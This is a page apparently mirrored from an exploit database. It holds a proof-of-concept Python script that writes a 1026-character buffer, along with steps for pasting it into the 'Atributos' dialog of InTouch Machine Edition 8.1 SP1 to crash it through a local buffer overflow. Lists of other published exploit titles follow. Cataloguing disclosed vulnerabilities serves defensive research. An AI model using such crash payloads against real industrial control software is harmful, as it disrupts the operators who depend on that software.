Search for hundreds of thousands of exploits

"InTouch Machine Edition 8.1 SP1 - 'Atributos' Denial of Service (PoC)"

Author

Exploit author

chuyreds

Platform

Exploit platform

windows

Release date

Exploit published date

2019-11-25

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
# Exploit Title: InTouch Machine Edition 8.1 SP1 - 'Atributos' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 12019-11-16
# Vendor Homepage: https://on.wonderware.com/
# Software Link : https://on.wonderware.com/intouch-machine-edition
# Tested Version: 8.1 SP1
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es
# InTouch Machine Edition 8.1 SP1.py


# Steps to Produce the Local Buffer Overflow (SEH Unicode):
# 1.- Run python code: InTouch_Machine_Edition_8.1.py
# 2.- Open InTouch_Machine_Edition_8.1.txt and copy content to clipboard
# 3.- Open ITME v8.1 InTouch Machine Edition
# 4.- On Graficos slect Atributos
# 5.- Paste ClipBoard on "No Redibujar"/"Deshabilitados" and click on "Aceptar"
#!/usr/bin/env python


buffer = "\x41" * 1026
f = open ("InTouch_Machine_Edition_8.1.txt", "w")
f.write(buffer)
f.close()
Release DateTitleTypePlatformAuthor
2020-07-07"Joomla! J2 JOBS 1.3.0 - 'sortby' Authenticated SQL Injection"webappsphp"Mehmet Kelepรงe"
2020-07-07"Sickbeard 0.1 - Remote Command Injection"webappshardwarebdrake
2020-07-07"Online Shopping Portal 3.1 - 'email' SQL Injection"webappsphpgh1mau
2020-07-07"BSA Radar 1.6.7234.24750 - Authenticated Privilege Escalation"webappsmultiple"William Summerhill"
2020-07-07"Microsoft Windows mshta.exe 2019 - XML External Entity Injection"remotexmlhyp3rlinx
2020-07-06"Grafana 7.0.1 - Denial of Service (PoC)"doslinuxmostwanted002
2020-07-06"Fire Web Server 0.1 - Remote Denial of Service (PoC)"doswindows"Saeed reza Zamanian"
2020-07-06"Nagios XI 5.6.12 - 'export-rrd.php' Remote Code Execution"webappsphp"Basim Alabdullah"
2020-07-06"File Management System 1.1 - Persistent Cross-Site Scripting"webappsphpKeopssGroup0day_Inc
2020-07-06"RiteCMS 2.2.1 - Authenticated Remote Code Execution"webappsphp"Enes ร–zeser"
Release DateTitleTypePlatformAuthor
2020-04-10"AbsoluteTelnet 11.12 - 'SSH1/username' Denial of Service (PoC)"doswindowschuyreds
2020-04-07"ZOC Terminal 7.25.5 - 'Script' Denial of Service (PoC)"doswindowschuyreds
2020-04-06"ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC)"doswindowschuyreds
2020-04-06"UltraVNC Viewer 1.2.4.0 - 'VNCServer' Denial of Service (PoC)"doswindowschuyreds
2020-04-06"UltraVNC Launcher 1.2.4.0 - 'Password' Denial of Service (PoC)"doswindowschuyreds
2020-04-06"UltraVNC Launcher 1.2.4.0 - 'RepeaterHost' Denial of Service (PoC)"doswindowschuyreds
2020-04-06"Memu Play 7.1.3 - Insecure Folder Permissions"localwindowschuyreds
2020-02-06"TapinRadio 2.12.3 - 'address' Denial of Service (PoC)"doswindowschuyreds
2020-02-06"AbsoluteTelnet 11.12 - 'license name' Denial of Service (PoC)"doswindowschuyreds
2020-02-06"AbsoluteTelnet 11.12 - 'SSH2/username' Denial of Service (PoC)"doswindowschuyreds
2020-02-06"AbsoluteTelnet 11.12 - _license name_ Denial of Service (PoC)"doswindowschuyreds
2020-02-06"TapinRadio 2.12.3 - 'username' Denial of Service (PoC)"doswindowschuyreds
2020-02-06"RarmaRadio 2.72.4 - 'username' Denial of Service (PoC)"doswindowschuyreds
2020-02-06"RarmaRadio 2.72.4 - 'server' Denial of Service (PoC)"doswindowschuyreds
2019-11-26"InduSoft Web Studio 8.1 SP1 - _Atributos_ Denial of Service (PoC)"doswindowschuyreds
2019-11-25"InTouch Machine Edition 8.1 SP1 - 'Atributos' Denial of Service (PoC)"doswindowschuyreds
2019-11-18"Foscam Video Management System 1.1.4.9 - 'Username' Denial of Service (PoC)"doswindowschuyreds
2019-11-12"Wondershare Application Framework Service 2.4.3.231 - 'WsAppService' Unquote Service Path"localwindowschuyreds
2019-11-12"Wondershare Application Framework Service - _WsAppService_ Unquote Service Path"localwindowschuyreds
2019-11-12"RTK IIS Codec Service 6.4.10041.133 - 'RtkI2SCodec' Unquote Service Path"localwindowschuyreds
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47711/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.